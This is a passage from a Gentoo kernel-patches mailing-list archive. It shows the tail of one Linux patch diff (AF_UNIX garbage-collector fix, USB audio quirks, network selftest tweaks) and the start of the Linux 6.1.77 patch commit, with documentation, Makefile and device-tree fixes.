+ 		if (err) {
+diff --git a/net/unix/garbage.c b/net/unix/garbage.c
+index dc27635403932..767b338a7a2d4 100644
+--- a/net/unix/garbage.c
++++ b/net/unix/garbage.c
+@@ -314,6 +314,17 @@ void unix_gc(void)
+ 	/* Here we are. Hitlist is filled. Die. */
+ 	__skb_queue_purge(&hitlist);
+ 
++#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
++	list_for_each_entry_safe(u, next, &gc_candidates, link) {
++		struct sk_buff *skb = u->oob_skb;
++
++		if (skb) {
++			u->oob_skb = NULL;
++			kfree_skb(skb);
++		}
++	}
++#endif
++
+ 	spin_lock(&unix_gc_lock);
+ 
+ 	/* There could be io_uring registered files, just push them back to
+diff --git a/sound/soc/amd/acp-config.c b/sound/soc/amd/acp-config.c
+index 9ee71a99a0871..0932473b63945 100644
+--- a/sound/soc/amd/acp-config.c
++++ b/sound/soc/amd/acp-config.c
+@@ -3,7 +3,7 @@
+ // This file is provided under a dual BSD/GPLv2 license. When using or
+ // redistributing this file, you may do so under either license.
+ //
+-// Copyright(c) 2021, 2023 Advanced Micro Devices, Inc.
++// Copyright(c) 2021 Advanced Micro Devices, Inc.
+ //
+ // Authors: Ajit Kumar Pandey <AjitKumar.Pandey@amd.com>
+ //
+@@ -35,19 +35,6 @@ static const struct config_entry config_table[] = {
+ 			{}
+ 		},
+ 	},
+-	{
+-		.flags = FLAG_AMD_LEGACY,
+-		.device = ACP_PCI_DEV_ID,
+-		.dmi_table = (const struct dmi_system_id []) {
+-			{
+-				.matches = {
+-					DMI_MATCH(DMI_SYS_VENDOR, "Valve"),
+-					DMI_MATCH(DMI_PRODUCT_NAME, "Jupiter"),
+-				},
+-			},
+-			{}
+-		},
+-	},
+ 	{
+ 		.flags = FLAG_AMD_SOF,
+ 		.device = ACP_PCI_DEV_ID,
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 33380cad3a735..b8a474a2e4d59 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2029,10 +2029,14 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_CTL_MSG_DELAY_1M | QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x0499, 0x1509, /* Steinberg UR22 */
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
++	DEVICE_FLG(0x0499, 0x3108, /* Yamaha YIT-W12TX */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x04d8, 0xfeea, /* Benchmark DAC1 Pre */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x04e8, 0xa051, /* Samsung USBC Headset (AKG) */
+ 		   QUIRK_FLAG_SKIP_CLOCK_SELECTOR | QUIRK_FLAG_CTL_MSG_DELAY_5M),
++	DEVICE_FLG(0x0525, 0xa4ad, /* Hamedal C20 usb camero */
++		   QUIRK_FLAG_IFACE_SKIP_CLOSE),
+ 	DEVICE_FLG(0x054c, 0x0b8c, /* Sony WALKMAN NW-A45 DAC */
+ 		   QUIRK_FLAG_SET_IFACE_FIRST),
+ 	DEVICE_FLG(0x0556, 0x0014, /* Phoenix Audio TMX320VC */
+@@ -2071,14 +2075,22 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+ 	DEVICE_FLG(0x0763, 0x2031, /* M-Audio Fast Track C600 */
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
++	DEVICE_FLG(0x07fd, 0x000b, /* MOTU M Series 2nd hardware revision */
++		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
+ 	DEVICE_FLG(0x08bb, 0x2702, /* LineX FM Transmitter */
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x0951, 0x16ad, /* Kingston HyperX */
+ 		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
+ 	DEVICE_FLG(0x0b0e, 0x0349, /* Jabra 550a */
+ 		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
++	DEVICE_FLG(0x0ecb, 0x205c, /* JBL Quantum610 Wireless */
++		   QUIRK_FLAG_FIXED_RATE),
++	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
++		   QUIRK_FLAG_FIXED_RATE),
+ 	DEVICE_FLG(0x0fd9, 0x0008, /* Hauppauge HVR-950Q */
+ 		   QUIRK_FLAG_SHARE_MEDIA_DEVICE | QUIRK_FLAG_ALIGN_TRANSFER),
++	DEVICE_FLG(0x1224, 0x2a25, /* Jieli Technology USB PHY 2.0 */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x1395, 0x740a, /* Sennheiser DECT */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x1397, 0x0507, /* Behringer UMC202HD */
+@@ -2111,6 +2123,10 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_ITF_USB_DSD_DAC | QUIRK_FLAG_CTL_MSG_DELAY),
+ 	DEVICE_FLG(0x1901, 0x0191, /* GE B850V3 CP2114 audio interface */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x19f7, 0x0035, /* RODE NT-USB+ */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x1bcf, 0x2283, /* NexiGo N930AF FHD Webcam */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x2040, 0x7200, /* Hauppauge HVR-950Q */
+ 		   QUIRK_FLAG_SHARE_MEDIA_DEVICE | QUIRK_FLAG_ALIGN_TRANSFER),
+ 	DEVICE_FLG(0x2040, 0x7201, /* Hauppauge HVR-950Q-MXL */
+@@ -2153,6 +2169,12 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x2912, 0x30c8, /* Audioengine D1 */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x2b53, 0x0023, /* Fiero SC-01 (firmware v1.0.0 @ 48 kHz) */
++		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
++	DEVICE_FLG(0x2b53, 0x0024, /* Fiero SC-01 (firmware v1.0.0 @ 96 kHz) */
++		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
++	DEVICE_FLG(0x2b53, 0x0031, /* Fiero SC-01 (firmware v1.1.0) */
++		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+ 	DEVICE_FLG(0x30be, 0x0101, /* Schiit Hel */
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x413c, 0xa506, /* Dell AE515 sound bar */
+@@ -2161,22 +2183,6 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_ALIGN_TRANSFER),
+ 	DEVICE_FLG(0x534d, 0x2109, /* MacroSilicon MS2109 */
+ 		   QUIRK_FLAG_ALIGN_TRANSFER),
+-	DEVICE_FLG(0x1224, 0x2a25, /* Jieli Technology USB PHY 2.0 */
+-		   QUIRK_FLAG_GET_SAMPLE_RATE),
+-	DEVICE_FLG(0x2b53, 0x0023, /* Fiero SC-01 (firmware v1.0.0 @ 48 kHz) */
+-		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+-	DEVICE_FLG(0x2b53, 0x0024, /* Fiero SC-01 (firmware v1.0.0 @ 96 kHz) */
+-		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+-	DEVICE_FLG(0x2b53, 0x0031, /* Fiero SC-01 (firmware v1.1.0) */
+-		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+-	DEVICE_FLG(0x0525, 0xa4ad, /* Hamedal C20 usb camero */
+-		   QUIRK_FLAG_IFACE_SKIP_CLOSE),
+-	DEVICE_FLG(0x0ecb, 0x205c, /* JBL Quantum610 Wireless */
+-		   QUIRK_FLAG_FIXED_RATE),
+-	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
+-		   QUIRK_FLAG_FIXED_RATE),
+-	DEVICE_FLG(0x1bcf, 0x2283, /* NexiGo N930AF FHD Webcam */
+-		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 
+ 	/* Vendor matches */
+ 	VENDOR_FLG(0x045e, /* MS Lifecam */
+diff --git a/tools/testing/selftests/net/cmsg_ipv6.sh b/tools/testing/selftests/net/cmsg_ipv6.sh
+index 330d0b1ceced3..c921750ca118d 100755
+--- a/tools/testing/selftests/net/cmsg_ipv6.sh
++++ b/tools/testing/selftests/net/cmsg_ipv6.sh
+@@ -91,7 +91,7 @@ for ovr in setsock cmsg both diff; do
+ 	check_result $? 0 "TCLASS $prot $ovr - pass"
+ 
+ 	while [ -d /proc/$BG ]; do
+-	    $NSEXE ./cmsg_sender -6 -p u $TGT6 1234
++	    $NSEXE ./cmsg_sender -6 -p $p $m $((TOS2)) $TGT6 1234
+ 	done
+ 
+ 	tcpdump -r $TMPF -v 2>&1 | grep "class $TOS2" >> /dev/null
+@@ -128,7 +128,7 @@ for ovr in setsock cmsg both diff; do
+ 	check_result $? 0 "HOPLIMIT $prot $ovr - pass"
+ 
+ 	while [ -d /proc/$BG ]; do
+-	    $NSEXE ./cmsg_sender -6 -p u $TGT6 1234
++	    $NSEXE ./cmsg_sender -6 -p $p $m $LIM $TGT6 1234
+ 	done
+ 
+ 	tcpdump -r $TMPF -v 2>&1 | grep "hlim $LIM[^0-9]" >> /dev/null
+diff --git a/tools/testing/selftests/net/pmtu.sh b/tools/testing/selftests/net/pmtu.sh
+index 1b6e484e586dc..00ab4c6e40446 100755
+--- a/tools/testing/selftests/net/pmtu.sh
++++ b/tools/testing/selftests/net/pmtu.sh
+@@ -1928,6 +1928,13 @@ check_command() {
+ 	return 0
+ }
+ 
++check_running() {
++	pid=${1}
++	cmd=${2}
++
++	[ "$(cat /proc/${pid}/cmdline 2>/dev/null | tr -d '\0')" = "{cmd}" ]
++}
++
+ test_cleanup_vxlanX_exception() {
+ 	outer="${1}"
+ 	encap="vxlan"
+@@ -1958,11 +1965,12 @@ test_cleanup_vxlanX_exception() {
+ 
+ 	${ns_a} ip link del dev veth_A-R1 &
+ 	iplink_pid=$!
+-	sleep 1
+-	if [ "$(cat /proc/${iplink_pid}/cmdline 2>/dev/null | tr -d '\0')" = "iplinkdeldevveth_A-R1" ]; then
+-		err "  can't delete veth device in a timely manner, PMTU dst likely leaked"
+-		return 1
+-	fi
++	for i in $(seq 1 20); do
++		check_running ${iplink_pid} "iplinkdeldevveth_A-R1" || return 0
++		sleep 0.1
++	done
++	err "  can't delete veth device in a timely manner, PMTU dst likely leaked"
++	return 1
+ }
+ 
+ test_cleanup_ipv6_exception() {
+diff --git a/tools/testing/selftests/net/udpgro_fwd.sh b/tools/testing/selftests/net/udpgro_fwd.sh
+index c079565add392..9690a5d7ffd7d 100755
+--- a/tools/testing/selftests/net/udpgro_fwd.sh
++++ b/tools/testing/selftests/net/udpgro_fwd.sh
+@@ -37,6 +37,10 @@ create_ns() {
+ 	for ns in $NS_SRC $NS_DST; do
+ 		ip netns add $ns
+ 		ip -n $ns link set dev lo up
++
++		# disable route solicitations to decrease 'noise' traffic
++		ip netns exec $ns sysctl -qw net.ipv6.conf.default.router_solicitations=0
++		ip netns exec $ns sysctl -qw net.ipv6.conf.all.router_solicitations=0
+ 	done
+ 
+ 	ip link add name veth$SRC type veth peer name veth$DST
+@@ -78,6 +82,12 @@ create_vxlan_pair() {
+ 		create_vxlan_endpoint $BASE$ns veth$ns $BM_NET_V6$((3 - $ns)) vxlan6$ns 6
+ 		ip -n $BASE$ns addr add dev vxlan6$ns $OL_NET_V6$ns/24 nodad
+ 	done
++
++	# preload neighbur cache, do avoid some noisy traffic
++	local addr_dst=$(ip -j -n $BASE$DST link show dev vxlan6$DST  |jq -r '.[]["address"]')
++	local addr_src=$(ip -j -n $BASE$SRC link show dev vxlan6$SRC  |jq -r '.[]["address"]')
++	ip -n $BASE$DST neigh add dev vxlan6$DST lladdr $addr_src $OL_NET_V6$SRC
++	ip -n $BASE$SRC neigh add dev vxlan6$SRC lladdr $addr_dst $OL_NET_V6$DST
+ }
+ 
+ is_ipv6() {
+@@ -117,7 +127,7 @@ run_test() {
+ 	# not enable GRO
+ 	ip netns exec $NS_DST $ipt -A INPUT -p udp --dport 4789
+ 	ip netns exec $NS_DST $ipt -A INPUT -p udp --dport 8000
+-	ip netns exec $NS_DST ./udpgso_bench_rx -C 1000 -R 10 -n 10 -l 1300 $rx_args &
++	ip netns exec $NS_DST ./udpgso_bench_rx -C 2000 -R 100 -n 10 -l 1300 $rx_args &
+ 	local spid=$!
+ 	sleep 0.1
+ 	ip netns exec $NS_SRC ./udpgso_bench_tx $family -M 1 -s 13000 -S 1300 -D $dst
+@@ -166,7 +176,7 @@ run_bench() {
+ 	# bind the sender and the receiver to different CPUs to try
+ 	# get reproducible results
+ 	ip netns exec $NS_DST bash -c "echo 2 > /sys/class/net/veth$DST/queues/rx-0/rps_cpus"
+-	ip netns exec $NS_DST taskset 0x2 ./udpgso_bench_rx -C 1000 -R 10  &
++	ip netns exec $NS_DST taskset 0x2 ./udpgso_bench_rx -C 2000 -R 100  &
+ 	local spid=$!
+ 	sleep 0.1
+ 	ip netns exec $NS_SRC taskset 0x1 ./udpgso_bench_tx $family -l 3 -S 1300 -D $dst
+diff --git a/tools/testing/selftests/net/udpgso_bench_rx.c b/tools/testing/selftests/net/udpgso_bench_rx.c
+index f35a924d4a303..1cbadd267c963 100644
+--- a/tools/testing/selftests/net/udpgso_bench_rx.c
++++ b/tools/testing/selftests/net/udpgso_bench_rx.c
+@@ -375,7 +375,7 @@ static void do_recv(void)
+ 			do_flush_udp(fd);
+ 
+ 		tnow = gettimeofday_ms();
+-		if (tnow > treport) {
++		if (!cfg_expected_pkt_nr && tnow > treport) {
+ 			if (packets)
+ 				fprintf(stderr,
+ 					"%s rx: %6lu MB/s %8lu calls/s\n",


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-02-05 21:01 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-02-05 21:01 UTC (permalink / raw
  To: gentoo-commits

commit:     d06ddefa86460048b227779b9813a87f6d78e2dc
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Feb  5 21:01:21 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Feb  5 21:01:21 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d06ddefa

Linux patch 6.1.77

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1076_linux-6.1.77.patch | 10940 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 10944 insertions(+)

diff --git a/0000_README b/0000_README
index a50e0cff..264766b5 100644
--- a/0000_README
+++ b/0000_README
@@ -347,6 +347,10 @@ Patch:  1075_linux-6.1.76.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.76
 
+Patch:  1076_linux-6.1.77.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.77
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1076_linux-6.1.77.patch b/1076_linux-6.1.77.patch
new file mode 100644
index 00000000..7b188eeb
--- /dev/null
+++ b/1076_linux-6.1.77.patch
@@ -0,0 +1,10940 @@
+diff --git a/Documentation/ABI/testing/sysfs-class-net-queues b/Documentation/ABI/testing/sysfs-class-net-queues
+index 978b76358661a..40d5aab8452d5 100644
+--- a/Documentation/ABI/testing/sysfs-class-net-queues
++++ b/Documentation/ABI/testing/sysfs-class-net-queues
+@@ -1,4 +1,4 @@
+-What:		/sys/class/<iface>/queues/rx-<queue>/rps_cpus
++What:		/sys/class/net/<iface>/queues/rx-<queue>/rps_cpus
+ Date:		March 2010
+ KernelVersion:	2.6.35
+ Contact:	netdev@vger.kernel.org
+@@ -8,7 +8,7 @@ Description:
+ 		network device queue. Possible values depend on the number
+ 		of available CPU(s) in the system.
+ 
+-What:		/sys/class/<iface>/queues/rx-<queue>/rps_flow_cnt
++What:		/sys/class/net/<iface>/queues/rx-<queue>/rps_flow_cnt
+ Date:		April 2010
+ KernelVersion:	2.6.35
+ Contact:	netdev@vger.kernel.org
+@@ -16,7 +16,7 @@ Description:
+ 		Number of Receive Packet Steering flows being currently
+ 		processed by this particular network device receive queue.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/tx_timeout
++What:		/sys/class/net/<iface>/queues/tx-<queue>/tx_timeout
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+@@ -24,7 +24,7 @@ Description:
+ 		Indicates the number of transmit timeout events seen by this
+ 		network interface transmit queue.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/tx_maxrate
++What:		/sys/class/net/<iface>/queues/tx-<queue>/tx_maxrate
+ Date:		March 2015
+ KernelVersion:	4.1
+ Contact:	netdev@vger.kernel.org
+@@ -32,7 +32,7 @@ Description:
+ 		A Mbps max-rate set for the queue, a value of zero means disabled,
+ 		default is disabled.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/xps_cpus
++What:		/sys/class/net/<iface>/queues/tx-<queue>/xps_cpus
+ Date:		November 2010
+ KernelVersion:	2.6.38
+ Contact:	netdev@vger.kernel.org
+@@ -42,7 +42,7 @@ Description:
+ 		network device transmit queue. Possible vaules depend on the
+ 		number of available CPU(s) in the system.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/xps_rxqs
++What:		/sys/class/net/<iface>/queues/tx-<queue>/xps_rxqs
+ Date:		June 2018
+ KernelVersion:	4.18.0
+ Contact:	netdev@vger.kernel.org
+@@ -53,7 +53,7 @@ Description:
+ 		number of available receive queue(s) in the network device.
+ 		Default is disabled.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/byte_queue_limits/hold_time
++What:		/sys/class/net/<iface>/queues/tx-<queue>/byte_queue_limits/hold_time
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+@@ -62,7 +62,7 @@ Description:
+ 		of this particular network device transmit queue.
+ 		Default value is 1000.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/byte_queue_limits/inflight
++What:		/sys/class/net/<iface>/queues/tx-<queue>/byte_queue_limits/inflight
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+@@ -70,7 +70,7 @@ Description:
+ 		Indicates the number of bytes (objects) in flight on this
+ 		network device transmit queue.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/byte_queue_limits/limit
++What:		/sys/class/net/<iface>/queues/tx-<queue>/byte_queue_limits/limit
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+@@ -79,7 +79,7 @@ Description:
+ 		on this network device transmit queue. This value is clamped
+ 		to be within the bounds defined by limit_max and limit_min.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/byte_queue_limits/limit_max
++What:		/sys/class/net/<iface>/queues/tx-<queue>/byte_queue_limits/limit_max
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+@@ -88,7 +88,7 @@ Description:
+ 		queued on this network device transmit queue. See
+ 		include/linux/dynamic_queue_limits.h for the default value.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/byte_queue_limits/limit_min
++What:		/sys/class/net/<iface>/queues/tx-<queue>/byte_queue_limits/limit_min
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+diff --git a/Documentation/sound/soc/dapm.rst b/Documentation/sound/soc/dapm.rst
+index 8e44107933abf..c3154ce6e1b27 100644
+--- a/Documentation/sound/soc/dapm.rst
++++ b/Documentation/sound/soc/dapm.rst
+@@ -234,7 +234,7 @@ corresponding soft power control. In this case it is necessary to create
+ a virtual widget - a widget with no control bits e.g.
+ ::
+ 
+-  SND_SOC_DAPM_MIXER("AC97 Mixer", SND_SOC_DAPM_NOPM, 0, 0, NULL, 0),
++  SND_SOC_DAPM_MIXER("AC97 Mixer", SND_SOC_NOPM, 0, 0, NULL, 0),
+ 
+ This can be used to merge to signal paths together in software.
+ 
+diff --git a/Makefile b/Makefile
+index 9dd167178ab4c..f5598d90093f5 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 76
++SUBLEVEL = 77
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx1-ads.dts b/arch/arm/boot/dts/imx1-ads.dts
+index 5833fb6f15d88..2c817c4a4c68f 100644
+--- a/arch/arm/boot/dts/imx1-ads.dts
++++ b/arch/arm/boot/dts/imx1-ads.dts
+@@ -65,7 +65,7 @@
+ 	pinctrl-0 = <&pinctrl_weim>;
+ 	status = "okay";
+ 
+-	nor: nor@0,0 {
++	nor: flash@0,0 {
+ 		compatible = "cfi-flash";
+ 		reg = <0 0x00000000 0x02000000>;
+ 		bank-width = <4>;
+diff --git a/arch/arm/boot/dts/imx1-apf9328.dts b/arch/arm/boot/dts/imx1-apf9328.dts
+index 77b21aa7a1469..27e72b07b517a 100644
+--- a/arch/arm/boot/dts/imx1-apf9328.dts
++++ b/arch/arm/boot/dts/imx1-apf9328.dts
+@@ -45,7 +45,7 @@
+ 	pinctrl-0 = <&pinctrl_weim>;
+ 	status = "okay";
+ 
+-	nor: nor@0,0 {
++	nor: flash@0,0 {
+ 		compatible = "cfi-flash";
+ 		reg = <0 0x00000000 0x02000000>;
+ 		bank-width = <2>;
+diff --git a/arch/arm/boot/dts/imx1.dtsi b/arch/arm/boot/dts/imx1.dtsi
+index e312f1e74e2fe..4aeb74479f44e 100644
+--- a/arch/arm/boot/dts/imx1.dtsi
++++ b/arch/arm/boot/dts/imx1.dtsi
+@@ -268,9 +268,12 @@
+ 			status = "disabled";
+ 		};
+ 
+-		esram: esram@300000 {
++		esram: sram@300000 {
+ 			compatible = "mmio-sram";
+ 			reg = <0x00300000 0x20000>;
++			ranges = <0 0x00300000 0x20000>;
++			#address-cells = <1>;
++			#size-cells = <1>;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/imx23-sansa.dts b/arch/arm/boot/dts/imx23-sansa.dts
+index 46057d9bf555b..c2efcc20ae802 100644
+--- a/arch/arm/boot/dts/imx23-sansa.dts
++++ b/arch/arm/boot/dts/imx23-sansa.dts
+@@ -175,10 +175,8 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "i2c-gpio";
+-		gpios = <
+-			&gpio1 24 0		/* SDA */
+-			&gpio1 22 0		/* SCL */
+-		>;
++		sda-gpios = <&gpio1 24 0>;
++		scl-gpios = <&gpio1 22 0>;
+ 		i2c-gpio,delay-us = <2>;	/* ~100 kHz */
+ 	};
+ 
+@@ -186,10 +184,8 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "i2c-gpio";
+-		gpios = <
+-			&gpio0 31 0		/* SDA */
+-			&gpio0 30 0		/* SCL */
+-		>;
++		sda-gpios = <&gpio0 31 0>;
++		scl-gpios = <&gpio0 30 0>;
+ 		i2c-gpio,delay-us = <2>;	/* ~100 kHz */
+ 
+ 		touch: touch@20 {
+diff --git a/arch/arm/boot/dts/imx23.dtsi b/arch/arm/boot/dts/imx23.dtsi
+index 7f4c602454a5f..ec476b1596496 100644
+--- a/arch/arm/boot/dts/imx23.dtsi
++++ b/arch/arm/boot/dts/imx23.dtsi
+@@ -414,7 +414,7 @@
+ 				status = "disabled";
+ 			};
+ 
+-			dma_apbx: dma-apbx@80024000 {
++			dma_apbx: dma-controller@80024000 {
+ 				compatible = "fsl,imx23-dma-apbx";
+ 				reg = <0x80024000 0x2000>;
+ 				interrupts = <7 5 9 26
+diff --git a/arch/arm/boot/dts/imx25-eukrea-cpuimx25.dtsi b/arch/arm/boot/dts/imx25-eukrea-cpuimx25.dtsi
+index 0703f62d10d1c..93a6e4e680b45 100644
+--- a/arch/arm/boot/dts/imx25-eukrea-cpuimx25.dtsi
++++ b/arch/arm/boot/dts/imx25-eukrea-cpuimx25.dtsi
+@@ -27,7 +27,7 @@
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+ 
+-	pcf8563@51 {
++	rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
+ 	};
+diff --git a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-cmo-qvga.dts b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-cmo-qvga.dts
+index 7d4301b22b902..1ed3fb7b9ce62 100644
+--- a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-cmo-qvga.dts
++++ b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-cmo-qvga.dts
+@@ -16,7 +16,7 @@
+ 		bus-width = <18>;
+ 		display-timings {
+ 			native-mode = <&qvga_timings>;
+-			qvga_timings: 320x240 {
++			qvga_timings: timing0 {
+ 				clock-frequency = <6500000>;
+ 				hactive = <320>;
+ 				vactive = <240>;
+diff --git a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-svga.dts b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-svga.dts
+index 80a7f96de4c6a..64b2ffac463b2 100644
+--- a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-svga.dts
++++ b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-svga.dts
+@@ -16,7 +16,7 @@
+ 		bus-width = <18>;
+ 		display-timings {
+ 			native-mode = <&dvi_svga_timings>;
+-			dvi_svga_timings: 800x600 {
++			dvi_svga_timings: timing0 {
+ 				clock-frequency = <40000000>;
+ 				hactive = <800>;
+ 				vactive = <600>;
+diff --git a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-vga.dts b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-vga.dts
+index 24027a1fb46d1..fb074bfdaa8dc 100644
+--- a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-vga.dts
++++ b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-vga.dts
+@@ -16,7 +16,7 @@
+ 		bus-width = <18>;
+ 		display-timings {
+ 			native-mode = <&dvi_vga_timings>;
+-			dvi_vga_timings: 640x480 {
++			dvi_vga_timings: timing0 {
+ 				clock-frequency = <31250000>;
+ 				hactive = <640>;
+ 				vactive = <480>;
+diff --git a/arch/arm/boot/dts/imx25-pdk.dts b/arch/arm/boot/dts/imx25-pdk.dts
+index fb66884d8a2fa..59b40d13a6401 100644
+--- a/arch/arm/boot/dts/imx25-pdk.dts
++++ b/arch/arm/boot/dts/imx25-pdk.dts
+@@ -78,7 +78,7 @@
+ 		bus-width = <18>;
+ 		display-timings {
+ 			native-mode = <&wvga_timings>;
+-			wvga_timings: 640x480 {
++			wvga_timings: timing0 {
+ 				hactive = <640>;
+ 				vactive = <480>;
+ 				hback-porch = <45>;
+diff --git a/arch/arm/boot/dts/imx25.dtsi b/arch/arm/boot/dts/imx25.dtsi
+index 5f90d72b840b0..5ac4549286bd7 100644
+--- a/arch/arm/boot/dts/imx25.dtsi
++++ b/arch/arm/boot/dts/imx25.dtsi
+@@ -543,7 +543,7 @@
+ 			};
+ 
+ 			iim: efuse@53ff0000 {
+-				compatible = "fsl,imx25-iim", "fsl,imx27-iim";
++				compatible = "fsl,imx25-iim";
+ 				reg = <0x53ff0000 0x4000>;
+ 				interrupts = <19>;
+ 				clocks = <&clks 99>;
+diff --git a/arch/arm/boot/dts/imx27-apf27dev.dts b/arch/arm/boot/dts/imx27-apf27dev.dts
+index 6f1e8ce9e76e9..3d9bb7fc3be2e 100644
+--- a/arch/arm/boot/dts/imx27-apf27dev.dts
++++ b/arch/arm/boot/dts/imx27-apf27dev.dts
+@@ -16,7 +16,7 @@
+ 		fsl,pcr = <0xfae80083>;	/* non-standard but required */
+ 		display-timings {
+ 			native-mode = <&timing0>;
+-			timing0: 800x480 {
++			timing0: timing0 {
+ 				clock-frequency = <33000033>;
+ 				hactive = <800>;
+ 				vactive = <480>;
+@@ -47,7 +47,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		user {
++		led-user {
+ 			label = "Heartbeat";
+ 			gpios = <&gpio6 14 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx27-eukrea-cpuimx27.dtsi b/arch/arm/boot/dts/imx27-eukrea-cpuimx27.dtsi
+index 74110bbcd9d4f..c7e9235848782 100644
+--- a/arch/arm/boot/dts/imx27-eukrea-cpuimx27.dtsi
++++ b/arch/arm/boot/dts/imx27-eukrea-cpuimx27.dtsi
+@@ -33,7 +33,7 @@
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+ 
+-	pcf8563@51 {
++	rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
